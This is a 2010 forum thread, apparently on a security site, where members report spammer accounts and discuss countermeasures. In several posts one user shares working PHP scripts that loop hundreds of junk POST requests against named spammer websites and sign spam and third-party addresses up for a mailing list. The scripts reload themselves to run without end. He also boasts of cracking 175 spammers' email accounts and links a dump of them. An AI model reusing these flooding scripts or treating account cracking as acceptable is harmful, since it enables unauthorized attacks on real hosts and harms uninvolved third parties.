Let's add them to their own spam-list:

<?php

set_time_limit(0);

function spamback2() {

$spammers = array('Caesarol@hotmail.com','www.gucci3.com@163.com','sellguccibag@hotmail.com');

$url = 'http://www.caesarol.us/user.php?act=email_list&job=add&email='.$spammers[rand(0,2)];

$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 0);

curl_exec($ch);


curl_close($ch);

}
$j=0;
for($i=0;$i<12;$i++) {
	spamback2();
	$j++;
}

if($j >=11) {
sleep(2);
echo "ok";
echo "<script>document.location=location.href;</script>";
}

?>

Or:

Here's how we solve that SPAM:

<?php


function spamback() {

$url = 'http://www.onmyperfectwatches.net/livechat.html';
$fields = array(
	'Name'=>"LULZ spammer ".mt_rand(0,0xfffff)."",
	'Email'=>"LULZ spammer ".mt_rand(0,0xfffff)."",
	'Content'=>"LULZ ".mt_rand(0,0xfffff)."",
	'mail_friend'=>"1",
	'Submit'=>"Submit"
);

foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string,'&');

$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_POST,count($fields));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 0);
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);

curl_exec($ch);
curl_close($ch);

}


$j=0;
for($i=0;$i<11;$i++) {
echo "<!-- ";
spamback();
echo " -->";
$j++;
}

if($j > 9) {
sleep(2);
echo "ok";
echo "<script>document.location=location.href;</script>";
}


?>

Edited 2 time(s). Last edit at 06/19/2010 12:36PM by Skyphire.

We could compute the confirmation hashes too, because they use this:

$hash = substr(md5(time()),1,10);

url:

act=email_list&job=add_check&hash=$hash&email=$email

Then it's easy to built a small matrix for 1-3 seconds and push them back. Silly security.

Another spammer:-
Posted by: weifeng (216.53.32.59.broad.mz.gd.dynamic.163data.com.cn)

He has posts everywhere, ID can you remove his posts I'd do it myself but there are a lot and I'd just get banned for writing a script.

@Skyphire

Hahahahhahahaah sweet :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Skyphire nice indeed :)

Posted by: angelina (ABTS-TN-dynamic-248.100.174.122.airtelbroadband.in)
Posted by: weifeng (41.10.135.219.broad.mm.gd.dynamic.163data.com.cn)
Posted by: elin319 (111.172.108.15)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 06/21/2010 09:53AM by Gareth Heyes.

sorry, was trying to not look at the internets this weekend! added them

-id

Updated stable release (; and more cross domain spammy. Next release will have proxy support. LOL just messing around eh.

<?php

set_time_limit(0);
echo mt_rand(0,0xfffff);

function spamback() {

// cross domain
$uries = array('http://www.onmyperfectwatches.net/livechat.html','http://www.caesarol.com/livechat.html','http://www.gucci3.com/livechat.html');

$fields = array(
	'Name'=>"LULZ spammer ".mt_rand(0,0xfffff)."",
	'Email'=>"LULZ spammer ".mt_rand(0,0xfffff)."",
	'Content'=>"LULZ ".mt_rand(0,0xfffff)."",
	'mail_friend'=>"1",
	'Submit'=>"Submit"
);

foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string,'&');

$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$uries[rand(0,2)]);
curl_setopt($ch,CURLOPT_POST,count($fields));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 0);
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
curl_exec($ch);
curl_close($ch);
}


$j=0;
for($i=0;$i<455;$i++) {
echo "<!-- ";
spamback();
echo " -->";
$j++;
}

if($j >=453) {
sleep(1);
echo "ok";
echo "<script>document.location=location.href;</script>";
}

?>

Part II:

<?php

set_time_limit(0);

function spamback2() {

// with easter egg.
$spammers = array('Caesarol@hotmail.com','www.gucci3.com@163.com','sellguccibag@hotmail.com','english@mail.gov.cn');

$url = 'http://www.caesarol.us/user.php?act=email_list&job=add&email='.$spammers[rand(0,3)];

$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 0);
curl_exec($ch);
curl_close($ch);
}

$j=0;
for($i=0;$i<455;$i++) {
	spamback2();
	$j++;
}

if($j >=453) {
sleep(2);
echo "ok";
echo "<script>document.location=location.href;</script>";
}

?>

Runs for 2 days now. Maybe I write a CLI one and put it in my cron. ^.^



Edited 5 time(s). Last edit at 06/21/2010 04:26PM by Skyphire.

Haha nice. Especially the easter egg. How soon until they blacklist your IP address though... I guess that's where making the code public comes in useful.

updated array:

$spammers = array('Caesarol@hotmail.com','www.gucci3.com@163.com','sellguccibag@hotmail.com','bayouboy5668@aol.com','abuse@163.com','abuse@godaddy.com','abuse@anti-spam.cn');

Let's see how long that domain stays online. ^.^

Posted by: stevejonathan10 (121.246.81.202.static-ahmedabad.vsnl.net.in)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Why do network operators suck at doing in-addr.arpa records correctly?

added

-id

Posted by: angelina (ABTS-TN-dynamic-001.178.174.122.airtelbroadband.in)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

That looks like a gateway, not sure if I want to block all of their customers.

-id

I just delete and post
proximityinfotech6 (ABTS-North-Static-107.45.176.122.airtelbroadband.in)
Posted by: tommy96 (wtl.worldcall.net.pk)

You should have CAPTCHAS or something on reg

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Gareth

I run a dating website as you might know, and put up CAPTCHA'S but they just type them over. Then I limited a maximum of sending 10 messages a day, but guess what: they don't care. I got some low level AI that detects sp4mmers, and deletes them based upon signatures, but they keep on creating accounts. It seems the more locks you put on it, the more they seems post. So in the end I start cracking their email-boxes (175 in total) after that, they still continued to sp4m, although a bit less as I cracked a couple of 'main' accounts where 'work' was delegated from. To my amazement, they have people sitting behind a cheap ass PC and getting the instruction to 'throw 3 or 5 a day' So little, seems enough. Notoriously crazy people.

Here is a small dump of their email accounts: http://www.skyphire.nl/phun/images/419.rar



Edited 3 time(s). Last edit at 07/14/2010 09:14AM by Skyphire.

@Skyphire

Interesting if these are real people and not bots maybe we can figure out a way to make it not worth their time. If we can somehow delay users when they enter a comment then maybe we'll eliminate manual spam

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Posted by: proximityinfotech6 (ABTS-North-Static-107.45.176.122.airtelbroadband.in)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

felix91 (46.211.205.121.broad.pt.fj.dynamic.163data.com.cn)

both blocked

-id

Johnkitty (202.78.224.125)

Posted by: yiqianchi (120.39.65.188)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

done

-id

yiqianchi (222.187.32.120.board.xm.fj.dynamic.163data.com.cn)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Posted by: yiqianchi (160.185.32.120.board.xm.fj.dynamic.163data.com.cn)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Locked the account.

Seems to be a lot more spam lately, I'll ping rsnake about doing something to slow it.

-id

I say let's block all of china ala old fashioned pilot way.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill



Edited 1 time(s). Last edit at 07/19/2010 03:12PM by thrill.

Here's some more spammers I've collected attacking wordpress:-
'91.201.66.6','220.250.1.3','95.211.27.210','59.58.190.166','194.44.171.14','58.22.68.147',
'81.92.204.1','201.16.248.154','200.141.207.2','84.204.14.14','213.83.63.50','216.134.194.36',
'211.14.18.62','195.238.236.4','66.35.250.15','217.30.180.53','195.188.89.200','64.241.37.140',
'200.89.188.195','66.80.248.146','88.56.223.100','202.108.11.106','207.67.117.178','207.154.21.218',
'81.241.238.103','81.241.238.103','202.108.11.106','202.108.11.106','72.36.94.120','66.230.204.130',
'66.230.204.130','66.230.204.130','66.230.204.130','66.230.204.130','67.18.100.186','67.18.100.186',
'202.108.11.106','122.152.129.17','202.108.11.106','85.214.62.129','85.214.62.129','85.214.62.129',
'85.214.62.129','61.135.162.212','202.108.11.106','141.223.95.7','61.135.162.212','202.108.11.106',
'202.108.11.106','207.67.117.178','207.67.117.178','81.26.192.227','80.177.186.130','74.52.30.66','64.46.39.14'

I wonder if it's possible to find something in common, maybe using flash cookies to monitor them or profile them in some way.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Posted by: djstore (217-170-98-136.internetbox.cz)
Posted by: Akshay123 (117.207.113.84)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 08/09/2010 02:04AM by Gareth Heyes.

Has 'seri4l' sent a suspicious PM to everyone or just me?

suspicious in what way?

-id